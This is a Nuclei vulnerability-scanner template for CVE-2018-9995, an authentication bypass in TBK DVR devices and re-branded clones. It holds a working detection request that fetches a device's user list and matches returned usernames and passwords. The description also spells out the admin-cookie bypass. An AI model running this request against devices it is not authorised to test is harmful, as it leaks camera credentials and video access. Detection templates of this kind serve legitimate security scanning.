nuclei-templates/cves/2018/CVE-2018-9995.yaml

43 lines
1.5 KiB
YAML

id: CVE-2018-9995
info:
name: TBK DVR4104/DVR4216 Devices - Authentication Bypass
author: princechaddha
severity: critical
description: |
TBK DVR4104 and DVR4216 devices, as well as Novo, CeNova, QSee, Pulnix, XVR 5 in 1, Securus, Night OWL, DVR Login, HVR Login, and
MDVR Login, which run re-branded versions of the original TBK DVR4104 and DVR4216 series, allow remote attackers to bypass
authentication via a "Cookie: uid=admin" header, as demonstrated by a device.rsp?opt=user&cmd=list request that provides credentials within JSON data in a response.
reference:
- https://www.exploit-db.com/exploits/44577/
- http://misteralfa-hack.blogspot.cl/2018/04/tbk-vision-dvr-login-bypass.html
- http://misteralfa-hack.blogspot.cl/2018/04/update-dvr-login-bypass-cve-2018-9995.html
- https://www.bleepingcomputer.com/news/security/new-hacking-tool-lets-users-access-a-bunch-of-dvrs-and-their-video-feeds/
- https://nvd.nist.gov/vuln/detail/CVE-2018-9995
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-9995
tags: cve,cve2018,auth-bypass,tbk
requests:
- method: GET
path:
- "{{BaseURL}}/device.rsp?opt=user&cmd=list"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "\"uid\":"
- "\"pwd\":"
- "\"view\":"
- "playback"
condition: and
- type: status
status:
- 200
# Enhanced by mp on 2022/05/16